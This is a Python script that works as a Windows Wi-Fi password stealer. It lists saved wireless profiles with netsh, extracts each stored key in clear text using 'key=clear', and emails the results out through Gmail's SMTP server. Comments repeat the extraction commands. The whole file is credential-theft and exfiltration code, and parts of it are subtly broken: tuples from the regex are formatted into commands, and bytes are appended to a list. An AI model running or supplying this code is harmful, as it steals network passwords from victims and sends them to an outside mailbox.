#!/usr/bin/env python
import subprocess
import smtplib
import re


def send_mail(email, passwd, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, passwd)
    server.sendmail(email, email, message)
    server.quit()


# [32bit] command = "%SystemRoot%\Sysnative\msg.exe * hello!!"
# [64bit] command = "msg * hello!!"
# [CMD : List of all previously connected wifi]
# ==> command = "netsh wlan show profile"
# [CMD : List passwd in clear text of previously connected wifi]
# ==> command = "netsh wlan show profile ACCESS_POINT_NAME key=clear"
spotter = "netsh wlan show profile"
stored_networks = subprocess.check_output(spotter, shell=True)
# network_name = re.search('(Profile\s*:\s)(.*)', stored_networks)
network_names_list = re.findall('(Profile\s*:\s)(.*)', stored_networks)
result = []
for network_name in network_names_list:
    # retriever = "netsh wlan show profile " + network_name + " key=clear"
    retriever = "netsh wlan show profile {} key=clear".format(network_name)
    passwd_extractor = subprocess.check_output(retriever, shell=True)
    result += passwd_extractor


send_mail("email", "passwd", result)
